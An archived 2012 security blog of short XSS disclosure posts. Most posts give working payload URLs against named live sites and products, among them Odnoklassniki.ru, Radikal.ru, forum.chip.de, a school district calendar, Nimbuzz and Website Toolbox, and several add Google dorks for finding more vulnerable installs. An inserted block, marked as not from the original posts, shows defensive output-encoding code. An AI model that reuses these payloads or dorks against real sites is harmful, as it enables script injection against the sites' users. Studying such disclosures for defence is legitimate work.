st2tea, a blog by Sony (http://www.blogger.com/profile/07357857456568656987)<br />
<br />
<b>Closed.</b> (posted 2012-04-20)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Reason?</b><br />
<br />
<b><span style="color: black;"><span style="color: black; font-family: Arial; font-size: small;">I will not post any bugs in the future, because I changed my views on this and now consider it to be unethical.</span></span></b><br />
<br /></div>
<b>ReadyDesk Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: ReadyDesk Cross Site Scripting</b><br />
<b># Date: 19.04.2012</b><br />
<b># Author: Sony</b><br />
<b># Software Link: http://www.readydesk.com/</b><br />
<b># Google Dorks: powered by readydesk</b><br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Blog : http://st2tea.blogspot.com</b><br />
<b># PoC:</b><br />
<b> http://st2tea.blogspot.com/2012/04/readydesk-cross-site-scripting.html</b><br />
<b>..................................................................</b><br />
<b><br /></b><br />
<b>Well, we have a persistent XSS in "View Existing Tickets".</b><br />
<br />
<b>We can use Demo:</b><br />
<br />
<b>http://www.readydesk.com/demo.asp</b><br />
<b><br /></b><br />
<b>http://www.readydesk.com/rd7/customer/rdlogin.aspx (Customer Interface)</b><br />
<b><br /></b><br />
<b>But first --> Submit New Ticket (with our xss code). (i think all fields in the send form)</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-PE_xdLqvMkM/T5BX2uzXaeI/AAAAAAAABAM/WBZ-PE3JhyU/s1600/ready.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-PE_xdLqvMkM/T5BX2uzXaeI/AAAAAAAABAM/WBZ-PE3JhyU/s320/ready.JPG" width="320" /></a></div>
<br /></div>
<b>ChatBlazer Flash Chat Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: ChatBlazer Flash Chat Cross Site Scripting<br /># Date: 19.04.2012<br /># Author: Sony<br /># Software Link: www.chatblazer.com/<br /># Web Browser : Mozilla Firefox<br /># Blog : http://st2tea.blogspot.com<br /># PoC:</b><br />
<b>http://st2tea.blogspot.com/2012/04/chatblazer-flash-chat-cross-site.html<br />.................................................................<br /><br />Well, we have cross site scripting in ChatBlazer.<br /><br />We can use Demo. (simple example)</b><br />
<br />
http://demo.chatblazer.net/cb8.5/client.php?username=%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29%3C/SCRIPT%3E&password=&roomid=1009&config=config.php%3Fembed%3D0<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-7YzWcOWVNe4/T4_vKoTi96I/AAAAAAAABAE/NWNAfZTijDI/s1600/chat.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-7YzWcOWVNe4/T4_vKoTi96I/AAAAAAAABAE/NWNAfZTijDI/s320/chat.JPG" width="320" /></a></div>
<br /></div>
<b>Fortune3 Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: Fortune3 Cross Site Scripting<br /># Date: 18.04.2012<br /># Author: Sony<br /># Software Link: http://www.fortune3.com/<br /># Google Dorks: Powered by FORTUNE3<br /># Web Browser : Mozilla Firefox<br /># Blog : http://st2tea.blogspot.com<br /># PoC:</b><br />
<b>http://st2tea.blogspot.com/2012/04/fortune3-cross-site-scripting.html<br />..................................................................<br /><br />Well, we have some XSS in Fortune3.<br /><br />Our test with http://www.naturalab.com (simple example)<br /><br />Add any product you want to the cart and open the Print Cart or Email Cart page.<br /><br />Print Cart and Email Cart:<br /><br />Put our XSS code in "Include a Note" and press the Continue button.</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-i7J2jt4wp6w/T46bSEvwcnI/AAAAAAAAA_Q/eizU1buwYfY/s1600/include1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-i7J2jt4wp6w/T46bSEvwcnI/AAAAAAAAA_Q/eizU1buwYfY/s320/include1.JPG" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-TWIqNgpQj2I/T46bmQhGGUI/AAAAAAAAA_g/W_csKjwTzvs/s1600/include2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-TWIqNgpQj2I/T46bmQhGGUI/AAAAAAAAA_g/W_csKjwTzvs/s320/include2.JPG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Pc7AVUzs1s8/T46bxue61qI/AAAAAAAAA_w/8GqA_yXMXlw/s1600/email1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-Pc7AVUzs1s8/T46bxue61qI/AAAAAAAAA_w/8GqA_yXMXlw/s320/email1.JPG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-JLfnHjRgAzU/T46cLaYmIrI/AAAAAAAAA_4/f4hu7En8WPY/s1600/email2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-JLfnHjRgAzU/T46cLaYmIrI/AAAAAAAAA_4/f4hu7En8WPY/s320/email2.JPG" width="320" /></a></div>
<br /></div>
<b>Hijacking attempt [mini funny xss stuff]</b> (posted 2012-04-17)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-BI6xNTGQ6DM/T43feQOUceI/AAAAAAAAA-o/5lwFEXmpb50/s1600/funny.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-BI6xNTGQ6DM/T43feQOUceI/AAAAAAAAA-o/5lwFEXmpb50/s320/funny.JPG" width="320" /></a></div>
<br />
<br />
<b><br /></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-m8s1anIe-Lg/T43f6TErj7I/AAAAAAAAA_I/cMZ4W8gBn5w/s1600/funny3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-m8s1anIe-Lg/T43f6TErj7I/AAAAAAAAA_I/cMZ4W8gBn5w/s320/funny3.JPG" width="320" /></a></div>
<br /></div>
<b>forum.chip.de xss</b> (posted 2012-04-16)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
http://codepad.org/2r8vW8DM<br />
<br />
<b>or</b><br />
<br />
http://forum.chip.de/newthread.php?do=newthread&f=155%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aryB4EnpvYU/T4yOxKAtf6I/AAAAAAAAA-I/eX4PkQesqJE/s1600/CHIP.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-aryB4EnpvYU/T4yOxKAtf6I/AAAAAAAAA-I/eX4PkQesqJE/s320/CHIP.JPG" width="320" /></a></div>
<br />
<b>O_o</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-AXpP7EYvZRY/T4yPD77ZllI/AAAAAAAAA-g/TqUmMVdUqW4/s1600/CHIP2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="http://2.bp.blogspot.com/-AXpP7EYvZRY/T4yPD77ZllI/AAAAAAAAA-g/TqUmMVdUqW4/s320/CHIP2.JPG" width="320" /></a></div>
<b>or</b><br />
<br />
http://forum.chip.de/grafikkarten/?daysprune=-1%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&order=desc&sort=views<br />
<br />
<b>%)</b><br />
<br />
<br /></div>
<b>Odnoklassniki.ru Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Date: 15.04.2012
# Author: Sony and Flexxpoint
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
# Flexxpoint Blog: http://flexxpoint.blogspot.com/</b></pre>
<pre><b># PoC:</b></pre>
<pre><b>http://st2tea.blogspot.com/2012/04/odnoklassnikiru-cross-site-scripting.html</b></pre>
<pre><b>..................................................................</b></pre>
<pre><b> </b></pre>
<pre><b>Well, we have a cross site scripting on Odnoklassniki.ru</b></pre>
<pre><b> </b></pre>
<pre><b>http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E</b></pre>
<pre><b> </b></pre>
<pre><b>or</b></pre>
<pre><b> </b></pre>
<pre><b>http://codepad.org/kKjrrn76</b></pre>
<pre> </pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HP_JgxRPiOw/T4r6Dh8lNwI/AAAAAAAAA9o/lAKOP1w9MrI/s1600/odnoklass1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-HP_JgxRPiOw/T4r6Dh8lNwI/AAAAAAAAA9o/lAKOP1w9MrI/s320/odnoklass1.JPG" width="320" /></a></div>
<pre></pre>
<pre></pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FmPWpbL1PjA/T4r6lsBQHfI/AAAAAAAAA-A/MuoujKKB-6U/s1600/odnoklass2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-FmPWpbL1PjA/T4r6lsBQHfI/AAAAAAAAA-A/MuoujKKB-6U/s320/odnoklass2.JPG" width="320" /></a></div>
<br />
<pre></pre>
<br />
<br />
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/PFB-oVstfFI?feature=player_embedded' frameborder='0'></iframe></div>
<pre></pre>
<br />
<pre></pre>
</div>
<b>HelpDen Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Exploit Title: HelpDen Cross Site Scripting
# Date: 15.04.2012
# Author: Sony
# Software Link: http://www.helpden.com/
# Google Dorks:inurl:.helpden.com/leavemessage.php?code
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/helpden-cross-site-scripting.html
..................................................................</b></pre>
<pre><b> </b></pre>
<pre><b>We have a simple xss in HelpDen.</b></pre>
<pre><b> </b></pre>
<pre><b>Our xss is here:</b></pre>
<pre><b> </b></pre>
<pre><b>https://url_name/leavemessage.php?code=[our xss]
</b></pre>
<pre><b> </b></pre>
<pre><b>https://admin.helpden.com/leavemessage.php?code=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E</b></pre>
<pre><b> </b></pre>
<pre><b>or </b></pre>
<pre><b> </b></pre>
<pre><b>http://codepad.org/wiyno0Wx</b></pre>
<pre> </pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-7r-YUfezNLo/T4q9g7ZknoI/AAAAAAAAA9g/bfNmth8BH7w/s1600/helpden.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-7r-YUfezNLo/T4q9g7ZknoI/AAAAAAAAA9g/bfNmth8BH7w/s320/helpden.JPG" width="320" /></a></div>
<pre></pre>
<pre></pre>
<pre></pre>
<pre></pre>
<pre></pre>
<pre></pre>
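Added example (not from the original posts): per-context output encoding for a reflected parameter such as HelpDen's <code>code</code>, run against the probe string from the link above, which packs one breakout per context (single- and double-quoted script strings, an HTML comment, a script block, a quoted attribute). The three-context page template and all function names are assumptions for illustration; HelpDen's real markup is not shown on this page.

```javascript
'use strict';

// Value of the `code` parameter from the HelpDen link on this page, kept
// percent-encoded as posted. CALL is the segment the probe repeats.
const CALL = 'alert%28String.fromCharCode%2888,83,83%29%29';
const PROBE_ENCODED =
  '%27;' + CALL + '//\\%27;' + CALL + '//%22;' + CALL + '//\\%22;' + CALL +
  '//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3E' + CALL + '%3C/SCRIPT%3E';
const PROBE = decodeURIComponent(PROBE_ENCODED);

// HTML text and quoted-attribute contexts: neutralise markup and both quotes.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// JavaScript string-literal context inside a <script> block: everything
// outside a small safe set becomes \uXXXX. That covers quotes, backslashes,
// "<" and "/" (so "</script>" cannot end the block) and line terminators.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hypothetical page that reflects the parameter in three output contexts
// without any encoding (the "before").
function renderVulnerable(code) {
  return [
    '<p>Code: ' + code + '</p>',
    '<input name="code" value="' + code + '">',
    '<script>var code = "' + code + '";</script>',
  ].join('\n');
}

// Same page, each reflection encoded for the context it lands in.
function renderHardened(code) {
  return [
    '<p>Code: ' + escapeHtml(code) + '</p>',
    '<input name="code" value="' + escapeHtml(code) + '">',
    '<script>var code = "' + escapeJsString(code) + '";</script>',
  ].join('\n');
}

// Count opening and closing script tags; the template itself contributes 2.
function countScriptTags(html) {
  return (html.match(/<\/?script\b/gi) || []).length;
}

// Decode the emitted literal the way a JS parser would. The escaper only
// produces \uXXXX escapes and safe characters, so JSON.parse can read it.
function decodeJsLiteral(escaped) {
  return JSON.parse('"' + escaped + '"');
}

function report() {
  return {
    vulnerableTags: countScriptTags(renderVulnerable(PROBE)),
    hardenedTags: countScriptTags(renderHardened(PROBE)),
    valuePreserved: decodeJsLiteral(escapeJsString(PROBE)) === PROBE,
  };
}

console.log(report());
```

In the hardened output only the template's own script tags remain, and the script still receives the user's exact input as data.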
</div>
<b>Radikal.ru Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Date: 15.04.2012</b></pre>
<pre><b># Author: Sony</b></pre>
<pre><b># Web Browser : Mozilla Firefox</b></pre>
<pre><b># Site: http://insecurity.ro </b></pre>
<pre><b># PoC: </b></pre>
<pre><b> </b></pre>
<pre><b>http://st2tea.blogspot.com/2012/04/radikalru-cross-site-scripting.html </b></pre>
<pre><b>..................................................................</b></pre>
<pre><b> </b></pre>
<pre><b>Well, we have a cross site scripting on Radikal.ru</b></pre>
<pre><b> </b></pre>
<pre><b>What is Radikal.ru?</b></pre>
<pre><b> </b></pre>
<pre><b>http://ru.wikipedia.org/wiki/Radikal.ru</b></pre>
<pre><b> </b></pre>
<pre><b>We have multiple XSS vulnerabilities.</b></pre>
<pre><b> </b></pre>
<pre><b>But I put only one in the archive, because it's simple to use.</b></pre>
<pre><b> </b></pre>
<pre><b>http://www.radikal.ru/GALLERY/PageGallery.aspx?pg=258&period=022008%22%22%3E%3Cscript%3Ealert%28%22Radikal.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E&id_gallery=-1 </b></pre>
<pre><b> </b></pre>
<pre><b>or </b></pre>
<pre><b> </b></pre>
<pre><b>http://codepad.org/qiZsoABI</b></pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-b3-RxxTrWR4/T4qfAbsLZGI/AAAAAAAAA8o/30tC1E6of44/s1600/radikal.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-b3-RxxTrWR4/T4qfAbsLZGI/AAAAAAAAA8o/30tC1E6of44/s320/radikal.JPG" width="320" /></a></div>
<br />
<pre></pre>
<br />
<b><br /></b><br />
<pre><b>Where is other xss on radikal.ru?</b></pre>
<pre><b>Use login..;) You can see in the edit pics, etc..</b></pre>
<pre><b>It's simple. </b></pre>
<pre> </pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-eaRkTzNVLDI/T4qh7TfDtxI/AAAAAAAAA9A/TXClm8UC2mY/s1600/radikal1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-eaRkTzNVLDI/T4qh7TfDtxI/AAAAAAAAA9A/TXClm8UC2mY/s320/radikal1.JPG" width="320" /></a></div>
<pre> </pre>
<pre> </pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LCm8g-A_70g/T4qkENJXw3I/AAAAAAAAA9Y/PHD4_DjpHos/s1600/radikal3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-LCm8g-A_70g/T4qkENJXw3I/AAAAAAAAA9Y/PHD4_DjpHos/s320/radikal3.JPG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<pre> </pre>
<pre></pre>
<pre></pre>
</div>
<b>SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting</b><br />
<b># Date: 11.04.2012</b><br />
<b># Author: Sony and Flexxpoint</b><br />
<b># Software Link: www.thinqed.com</b><br />
<b># Google Dorks: inurl:/education/components/calendar/ site:edu</b><br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Site : http://insecurity.ro</b><br />
<b># PoC: </b><br />
<b>http://st2tea.blogspot.com/2012/04/schoolcenter-web-tools-version-11027.html</b><br />
<b>..................................................................</b><br />
<b><br /></b><br />
<b>Well, we have xss in calendar.</b><br />
<b><br /></b><br />
<b>Demo:</b><br />
<br />
<br />
http://schoolctr.hebisd.edu/education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-iUHFDKmBpO8/T4W34sQCX4I/AAAAAAAAA8g/uKfMF4sIUrQ/s1600/xss.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-iUHFDKmBpO8/T4W34sQCX4I/AAAAAAAAA8g/uKfMF4sIUrQ/s320/xss.JPG" width="320" /></a></div>
<br />
<br />
<b>etc..</b></div>
<b>Nimbuzz 2.2.0 Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Exploit Title: Nimbuzz 2.2.0 Cross Site Scripting
# Date: 09.04.2012
# Author: Sony
# Software Link: http://www.nimbuzz.com/en/get/voip-and-chat-on-pc/pc-client-downloaded
# Software Version: 2.2.0
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/nimbuzz-220-cross-site-scripting.html
..................................................................</b></pre>
<pre><b> </b></pre>
<pre><b>Well, we have xss in the messenger, interesting place for xss)</b></pre>
<pre><b> </b></pre>
<pre> </pre>
<pre></pre>
<pre></pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oZCtF5p8yPg/T4LmoWSfz-I/AAAAAAAAA8A/NwcttC0s4c0/s1600/ni.png" imageanchor="1"><img border="0" height="240" src="http://1.bp.blogspot.com/-oZCtF5p8yPg/T4LmoWSfz-I/AAAAAAAAA8A/NwcttC0s4c0/s400/ni.png" width="219" /></a></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
</div>
</div>
<b>We have xss in the Chat Window-->View in Browser. (persistent code)
Some pics and video PoC: </b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-lDyKyFhqWiU/T4LqFhg9LQI/AAAAAAAAA8M/Mc7FcodbdPM/s1600/nim.JPG" imageanchor="1"><img border="0" height="300" src="http://4.bp.blogspot.com/-lDyKyFhqWiU/T4LqFhg9LQI/AAAAAAAAA8M/Mc7FcodbdPM/s400/nim.JPG" width="400" /></a></div>
<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/t8mC6Oceq0Y" frameborder="0" allowfullscreen></iframe>
<br />
<br />
<b>And where is forget password: </b><br />
<br />
<br />
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-LXxT4HBs80A/T4Lu1IdlbaI/AAAAAAAAA8Y/YyCzOcyh76I/s1600/nimb2.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-LXxT4HBs80A/T4Lu1IdlbaI/AAAAAAAAA8Y/YyCzOcyh76I/s400/nimb2.JPG" width="400" /></a></div>
</div>
<b>eBuddy.com Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Date: 07.04.2012
# Author: Sony
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
..................................................................</b></pre>
<pre> </pre>
<pre>http://codepad.org/t278Y5Qo</pre>
<pre> </pre>
<pre> </pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-1Ptjrg6ep6I/T3_8g4SK2jI/AAAAAAAAA7s/QWF5UwvxN8A/s1600/hello.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-1Ptjrg6ep6I/T3_8g4SK2jI/AAAAAAAAA7s/QWF5UwvxN8A/s320/hello.JPG" width="320" /></a></div>
<pre> </pre>
<pre> </pre>
<pre> </pre>
<pre> </pre>
<pre> </pre>
<pre> </pre>
</div>
<b>Website Toolbox Cross Site Scripting</b><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: Website Toolbox Cross Site Scripting</b><br />
<b># Date: 7.04.2012</b><br />
<b># Author: Sony</b><br />
<b># Software Link: http://websitetoolbox.com</b><br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Site : http://insecurity.ro</b><br />
<b># PoC:
http://st2tea.blogspot.com/2012/04/website-toolbox-cross-site-scripting.html </b><br />
<br />
<b>..................................................................</b><br />
<br />
<b>Well, we have multiple cross site scripting vulnerabilities.</b><br />
<b><br /></b><br />
<b>Simple examples:</b><br />
<br />
http://greentea.websitetoolbox.com/register?s_username=&s_email=&s_im=%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C%2Fscript%3E&s_regafter_month=&s_regafter_day=&s_regafter_year=&s_regbefore_month=&s_regbefore_day=&s_regbefore_year=&last_post_date_after_month=&last_post_date_after_day=&last_post_date_after_year=&last_post_date_before_month=&last_post_date_before_day=&last_post_date_before_year=&lastvisit_month_after=&lastvisit_day_after=&lastvisit_year_after=&lastvisit_month_before=&lastvisit_day_before=&lastvisit_year_before=&s_postsgreater=&s_postsless=&field240875=&field240876=&field240877=&field240878=&birthday_after_month=&birthday_after_day=&birthday_after_year=&birthday_before_month=&birthday_before_day=&birthday_before_year=&ip_address=&usergroupid=&Submit=Search&fieldid_fields=240875%2C240876%2C240877%2C240878%2C&action=members&search=true<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-A38gvC86vAg/T39cGxuC9kI/AAAAAAAAA7M/5HDUkPTTFXo/s1600/1.JPG" imageanchor="1"><img border="0" height="300" src="http://3.bp.blogspot.com/-A38gvC86vAg/T39cGxuC9kI/AAAAAAAAA7M/5HDUkPTTFXo/s400/1.JPG" width="400" /></a></div>
<br />
<br />
http://www.websitetoolbox.com/cgi/members/mb_admins.cgi?action=moderatorlogs&type=calendar_logs%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-ST7U4os6-tc/T39cMgf7GTI/AAAAAAAAA7Y/PSjqyP8xeAg/s1600/2.JPG" imageanchor="1"><img border="0" height="300" src="http://3.bp.blogspot.com/-ST7U4os6-tc/T39cMgf7GTI/AAAAAAAAA7Y/PSjqyP8xeAg/s400/2.JPG" width="400" /></a></div>
<br />
<br />
http://greentea.websitetoolbox.com/register/register?edit=1&userid=1885232%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-PV32u8rqwo0/T39cTEYmXZI/AAAAAAAAA7k/VZbHyamwQts/s1600/3.JPG" imageanchor="1"><img border="0" height="300" src="http://4.bp.blogspot.com/-PV32u8rqwo0/T39cTEYmXZI/AAAAAAAAA7k/VZbHyamwQts/s400/3.JPG" width="400" /></a></div>
<br />
<b><br /></b><br />
<b>etc..</b><br />
</div>
<b>IP.Board Addon IP.Gallery 4.2.1 Cross Site Scripting</b><br />
<b># Exploit Title: IP.Board Addon IP.Gallery 4.2.1 Cross Site Scripting <br />
# Date: 27.03.2012<br />
# Author: Sony and Flexxpoint</b><br />
<b># Software Link:</b> http://community.invisionpower.com/<br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Blog Flexxpoint:</b> http://flexxpoint.blogspot.com/<br />
<b># Blog Sony:</b> http://st2tea.blogspot.com<br />
<b># Site :</b> http://insecurity.ro<br />
<b># PoC:</b> <br />
http://st2tea.blogspot.com/2012/03/ipboard-330-cross-site-scripting.html<br />
<b>..................................................................</b><br />
<br />
<b>Xss bug in Gallery Search.<br />
<br />
It's a very simple XSS, but hard to use.</b> <br />
<br />
http://community.invisionpower.com/index.php?s=blablabla&&app=gallery&module=ajax&section=albumSelector&do=albumSelectorPane&secure_key=blalblabla&type=upload&albums=search&moderate=&album_id=1593&member_id=&searchType=member&searchMatch=is&searchIsGlobal=0&searchSort=date&searchDir=desc&searchText=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000252%29%3C%2Fscript%3E<br />
<br />
<b>You can't see this. Create your bug in the gallery and you can see this.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-X0zz0Cat4cM/T3HCBFh43JI/AAAAAAAAA4w/oEXQRrPRWv8/s1600/IPSEARCHGALLERY.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-X0zz0Cat4cM/T3HCBFh43JI/AAAAAAAAA4w/oEXQRrPRWv8/s400/IPSEARCHGALLERY.JPG" /></a></div><br />
